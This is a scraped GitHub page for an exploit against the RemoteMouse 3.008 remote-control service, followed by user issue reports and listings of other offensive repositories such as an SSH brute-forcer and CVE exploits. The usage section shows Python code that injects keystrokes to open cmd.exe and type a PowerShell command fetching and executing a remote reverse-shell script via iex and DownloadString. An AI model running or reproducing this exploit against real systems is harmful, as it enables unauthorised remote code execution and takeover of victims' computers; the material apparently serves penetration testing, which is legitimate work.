This exploit allows to connect to the remote RemoteMouse 3.008 service to virtually press arbitrary keys and execute code on the machine.

Related tags

Security related resourcesremote-controlexploitpentestremotemouse
Overview

RemoteMouse-3.008-Exploit

The RemoteMouse application is a program for remotely controlling a computer from a phone or tablet. This exploit allows to connect to the remote RemoteMouse service to virtually press arbitrary keys and execute code on the machine.

Video Proof of Concept

poc.mp4

Usage

remotemouse = RemoteMouse(host=options.target_ip, verbose=options.verbose)

# Press Win + R
remotemouse._send_command(Keymap.KEY_WIN)

# Type cmd.exe
remotemouse.keyboard.press(Keymap.KEY_BACKSPACE)
remotemouse.keyboard.type("cmd.exe")
remotemouse.keyboard.press(Keymap.KEY_RETURN)

# Wait for cmd.exe to start
time.sleep(0.5)

# Payload
cmd = "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://192.168.2.51:8000/revshell.ps1')\""

# Send payload char by char
remotemouse.keyboard.type(cmd)

# Press enter to execute payload
remotemouse.keyboard.press(Keymap.KEY_WIN)

Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.

References

Comments
  • unsupported operand type(s) Python 3.10.4

    unsupported operand type(s) Python 3.10.4

    Hey,

    I'm getting issues when running the exploit on Python 3.10.4. $ python3 Remote.py -v -t $IP

    [cmd] Keymap.KEY_WIN
ERROR: a bytes-like object is required, not 'Keymap'
[cmd] key  3BASd
Traceback (most recent call last):
  File "/tmp/Remote.py", line 275, in <module>
    remotemouse.keyboard.type("cmd.exe")
  File "/tmp/Remote.py", line 171, in type
    self.press(character)
  File "/tmp/Remote.py", line 178, in press
    self.parent_remotemouse._send_command(self.charset[key] + "d")
TypeError: unsupported operand type(s) for +: 'Keymap' and 'str'
    opened by Darktortue 1
  • the script is not running as expected

    the script is not running as expected

    ISSUE

    Using the provided RemoteMouse-3.008-Exploit.py AS-IS, will not work.

    EXPECTED BEHAVIOR

    • I'm expecting the start menu to open and the cmd.exe to be written...

    ACTUAL BEHAVIOR

    • Nothing opens or written

    TROUBLESHOOTING

    • I've changed remotemouse._send_command(Keymap.KEY_WIN.value) to remotemouse.keyboard.press(Keymap.KEY_WIN)
      • now the start menu opens
    • I wanted to just test the typing functionality with remotemouse.keyboard.type("cmd.exe")
      • I opened a notepad with the cursor active on it, nothing happened.

    ENVIRONMENT

    • source: Kali Linux
      • Python 3.9.12
    • target: Windows 10 (version 1709)
    opened by bigoper 0
  • not sure why it's trying to enum a keymap

    not sure why it's trying to enum a keymap 

    class Keymap(Enum):

    File "./yeaboi.py", line 118, in Keymap KEY_MINUS = "7[ras]24" File "/usr/lib/python3.6/enum.py", line 92, in setitem raise TypeError('Attempted to reuse key: %r' % key) TypeError: Attempted to reuse key: 'KEY_MINUS'

    opened by NAP3XD 0
  • Having issue when running the script

    Having issue when running the script

    Hi P0dalirius,

    This is an awsome exploit but i'm having some issues running it from my VM, are you able to advise as to why? I'm running ./remote -v -t $IP Traceback (most recent call last): File "/home**<redcated>**/p0dalirius-RemoteMouse-3.008-Exploit-1cb4f0d/RemoteMouse-3.008-Exploit.py", line 25, in <module> class Keymap(Enum): File "/home/**<redcated>**/p0dalirius-RemoteMouse-3.008-Exploit-1cb4f0d/RemoteMouse-3.008-Exploit.py", line 115, in Keymap KEY_MINUS = "7[ras]24" File "/usr/lib/python3.9/enum.py", line 133, in __setitem__ raise TypeError('Attempted to reuse key: %r' % key) TypeError: Attempted to reuse key: 'KEY_MINUS'

    opened by reshfi 0
  • Running exploit in slower networks leads to

    Running exploit in slower networks leads to "not-in-order" output

    Thanks for your well written exploit code, but I have one issue with the execution of it in worse network conditions than a local network. A good addition would be to add a configurable sleep between the keystrokes to make this issue less common.

    Otherwise it would look like this: image

    opened by 1989gironimo 0
Releases(1.0)
Owner
Podalirius
Hacker of everything
Podalirius
GitHub Repository https://podalirius.net/en/articles/writing-an-exploit-for-remotemouse-3.008/
A simple multi-threaded distributed SSH brute-forcing tool written in Python.

OrbitalDump A simple multi-threaded distributed SSH brute-forcing tool written in Python. How it Works When the script is executed without the --proxi

K4YT3X 408 Jan 03, 2023
PwdGen is a Python Tkinter tool for generating secure 16 digit passwords.

PwdGen ( Password Generator ) is a Python Tkinter tool for generating secure 16 digit passwords. Installation Simply install requirements pip install

zJairO 7 Jul 14, 2022
Python program that generates secure passwords.

Python program that generates secure passwords. The user has the option to select the length of the password, amount of passwords,

4 Dec 07, 2021
Lite - Lite cracker tool for python

Wellcome to tools Results Install Tools

Jeeck X Nano 23 Dec 17, 2022
Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1

CVE-2021-22911 Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1 The getPasswordPolicy method is vulnerable to NoS

Enox 47 Nov 09, 2022
A Python script that can be used to check if a SAP system is affected by CVE-2022-22536

Vulnerability assessment for CVE-2022-22536 This repository contains a Python script that can be used to check if a SAP system is affected by CVE-2022

Onapsis Inc. 42 Dec 01, 2022
com_media allowed paths that are not intended for image uploads to RCE

CVE-2021-23132 com_media allowed paths that are not intended for image uploads to RCE. CVE-2020-24597 Directory traversal in com_media to RCE Two CVEs

KIEN HOANG 67 Nov 09, 2022
πŸ’£ Bomb Crypto Bot πŸ’£

πŸ’£ Bomb Crypto Bot πŸ’£ ⚠️ Warning I am not responsible for any penalties incurred by those who use the bot, use it at your own risk. πŸ“„ Documentation -

Matheus Benites 4 Apr 27, 2022
Natas teaches the basics of serverside web-security.

over-the-wire-natas Natas teaches the basics of serverside web-security. Each level of natas consists of its own website located at http://natasX.nata

Siddhant Chouhan 1 Nov 27, 2021
A cross-platform Python module that displays **** for password input. Works on Windows, unlike getpass. Formerly called stdiomask.

PWInput A cross-platform Python module that displays **** for password input. Works on Windows, unlike getpass. Formerly called stdiomask. Installatio

Al Sweigart 26 Sep 04, 2022
Implementation of RITA (Real Intelligence Threat Analytics) in Jupyter Notebook with improved scoring algorithm.

RITA (Real Intelligence Threat Analytics) in Jupyter Notebook RITA is an open source framework for network traffic analysis sponsored by Active Counte

Mehmet E. 157 Nov 24, 2022
Phoenix Framework is an environment for writing, testing and using exploit code.

Phoenix Framework is an environment for writing, testing and using exploit code. πŸ–Ό Screenshots πŸŽͺ Community PwnWiki Forums πŸ”‘ Licen

42 Aug 09, 2022
Security audit Python project dependencies against security advisory databases.

Security audit Python project dependencies against security advisory databases.

52 Dec 17, 2022
Encrypted Python Password Manager

PyPassKeep Encrypted Python Password Manager About PyPassKeep (PPK for short) is an encrypted python password manager used to secure your passwords fr

KrisIsHere 1 Nov 17, 2021
Selamat Datang DiTools Crack-Old, Crack Old Adalah Sebuah Crack Tanpa Login Dan Crack Menggunakan Akun Facebook Tua/Old.

Selamat Datang DiTools Crack-Old, Crack Old Adalah Sebuah Crack Tanpa Login Dan Crack Menggunakan Akun Facebook Tua/Old. ([Welcome to Crack-Old Tools, Old Crack Is A Crack Without Login And Crack Usi

Risky [ Zero Tow ] 7 Dec 25, 2022
A quick script to spot the usage of Unicode Bidi (bidirectional) characters that could lead to an Invisible Backdoor

Invisible Backdoor Detector is a little Python script that allows you to spot and remove Bidi characters that could lead to an invisible backdoor. If you don't know what that is you should check the

SecSI 28 Dec 29, 2022
Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).

What is Spray365? Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD). How is Spray3

Mark Hedrick 246 Dec 28, 2022
HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

HatVenom HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures. Featu

EntySec 100 Dec 23, 2022
A decompilation of the Nintendo Switch version of Captain Toad: Treasure Tracker

cttt-decomp A decompilation of the Nintendo Switch version of Captain Toad: Trea

shibbs 14 Aug 17, 2022
Tool for finding PHP source code vulnerabilities.

vulnz Tool for finding php source code vulnerabilities. Scans PHP source code and prints out potentially dangerous lines. This tool is useful for secu

Mateo HanΕΎek 1 Jan 14, 2022